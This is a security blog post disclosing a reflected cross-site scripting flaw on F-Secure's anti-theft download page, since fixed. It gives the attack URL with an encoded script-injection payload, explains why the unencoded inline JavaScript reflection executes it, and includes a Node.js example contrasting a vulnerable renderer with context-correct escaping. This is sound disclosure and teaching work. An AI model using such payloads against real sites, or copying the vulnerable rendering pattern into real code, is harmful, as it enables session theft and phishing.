F-Secure XSS on Anti-Theft Website

In a new section supporting the release of an anti-theft product for mobile phones, the web site of the Helsinki-based anti-virus company F-Secure is vulnerable to reflected cross-site scripting (XSS).

XSS String

A hidden form field reflects the value of a URL query parameter (hidManufacturer in this case) back into the page.

Attack URL:

http://www.f-secure.com/en_EMEA/products/mobile/anti-theft-download/anti-theft-download-wizard.html?hidManufacturer=%27%22%3E%3C/title%3E%3Cscript%3Ealert%28/Mikko%20rulz/%29%3C/script%3E

First reflection of the URL parameter, in the hidden form field:

<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="\'\&quot;&gt;&lt;\/title&gt;&lt;script&gt;alert(\/Mikko rulz\/)&lt;\/script&gt;"/></p>

Nothing happens on this first reflection, because the bracket and quote characters passed in the URL are entity-encoded as &quot;, &gt; and &lt; when the page is rendered. This is the correct practice for an HTML attribute value and prevents many forms of cross-site scripting.

Unfortunately a script later in the page inserts the same value into a JavaScript string literal without any of that encoding.

Second reflection in the page of the same value:

<script type="text/javascript">
    document.getElementById(''"></title><script>alert(/Mikko rulz/)</script>').setAttribute("class", "selected");
    document.getElementById(''"></title><script>alert(/Mikko rulz/)</script>').setAttribute("className", "selected");
</script>

The script reflects the parameter value into a JavaScript string literal with no encoding at all. Since the browser's HTML parser ends a script element at the first </script> it encounters, the payload's closing tag terminates the page's own script (which then fails to parse, which costs the attacker nothing), and the payload's <script>alert(/Mikko rulz/)</script> is parsed as a new script element and executed. HTML entity encoding is the wrong tool for this location; a value placed inside a JavaScript string must be escaped for that context (quotes, backslashes, and the <, > and & characters written as \uXXXX escapes), or kept out of inline script altogether.
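As an added example, not code from the original post or from F-Secure's site, the Node.js snippet below reconstructs the two reflections with a hypothetical server-side template (the markup around the value is assumed; the backslash-escaping visible in the page's first reflection is not reproduced). It uses the payload decoded from the attack URL as constructed input and shows the attribute-context encoding the page already had beside the JavaScript-string-context encoding the page was missing, then counts how many script elements the HTML tokenizer would see in each rendering.

```javascript
// Added example: a minimal server-side renderer that reproduces the two
// reflections discussed in the post and the per-context encoding that fixes
// the second one.  It is not F-Secure's code; the template text is assumed.

// Payload decoded from the attack URL's hidManufacturer parameter
// (constructed input for this example).
const PAYLOAD = `'"></title><script>alert(/Mikko rulz/)</script>`;

// HTML attribute context: entity-encode the five characters that can end an
// attribute value or open a tag.  This is the encoding the page already
// applied to its hidden <input>.
function encodeForHtmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context inside an inline <script>.  JSON.stringify
// quotes the value and escapes quotes and backslashes, but leaves "</script>"
// intact, and the HTML parser would still end the script element there.  So
// <, >, & and the line terminators U+2028/U+2029 are additionally written as
// \uXXXX escapes, which the JavaScript engine decodes back to the original
// characters only when it evaluates the literal, after HTML parsing is done.
function encodeForJsString(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The behaviour described in the post: the attribute is encoded, the script
// interpolation is not.
function renderVulnerable(manufacturer) {
  return [
    `<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="${encodeForHtmlAttr(manufacturer)}"/>`,
    '<script type="text/javascript">',
    `    document.getElementById('${manufacturer}').setAttribute("class", "selected");`,
    '</script>',
  ].join('\n');
}

// Same page with the script interpolation escaped for its context.
function renderFixed(manufacturer) {
  return [
    `<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="${encodeForHtmlAttr(manufacturer)}"/>`,
    '<script type="text/javascript">',
    `    document.getElementById(${encodeForJsString(manufacturer)}).setAttribute("class", "selected");`,
    '</script>',
  ].join('\n');
}

// Crude check that mirrors what the HTML tokenizer will do with the output:
// count the <script start tags.  A correctly rendered page has exactly one.
function countScriptStartTags(html) {
  return (html.match(/<script[\s>]/gi) || []).length;
}

console.log(countScriptStartTags(renderVulnerable(PAYLOAD))); // 2: the payload opened a second script
console.log(countScriptStartTags(renderFixed(PAYLOAD)));      // 1
```

The fixed rendering still carries the attacker's string, but the HTML tokenizer never sees a `<` inside the script element, and `JSON.parse` (or the JavaScript engine at runtime) recovers the original value unchanged, so the element lookup behaves the same for legitimate manufacturer names.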


Finally

The Mikko reference is to Mikko Hypponen, the well-known Chief Research Officer at F-Secure. The defect was submitted to XSSED by Xylitol. At a glance this appears to be the first new site-specific problem on the main F-Secure web site (country-specific versions have had issues) since the F-Secure forum defacement in 2007.

Reflected cross-site scripting sits at the low end of the scale of web application vulnerabilities, but it is effective in phishing-style attacks: the link genuinely points at the F-Secure site, yet the script it carries runs in the F-Secure origin and can steal the user's session, redirect the user, serve them malware, and so on. As always it behooves a security company to correct problems like this fairly quickly, and F-Secure clearly knows what to do already, since it is using output encoding in one part of the page.

Update 06/8/2010

The problem was corrected quickly, and the issue explained competently by Mikko, as expected.

Filed Under: Cross Site Scripting


Comments (3)


  1. [...] types of flaws on an information security site the end of the world? We just wrote a story about F-Secure having something similar on their US site last week. The difference: F-Secure corrected the issue, and wrote a post [...]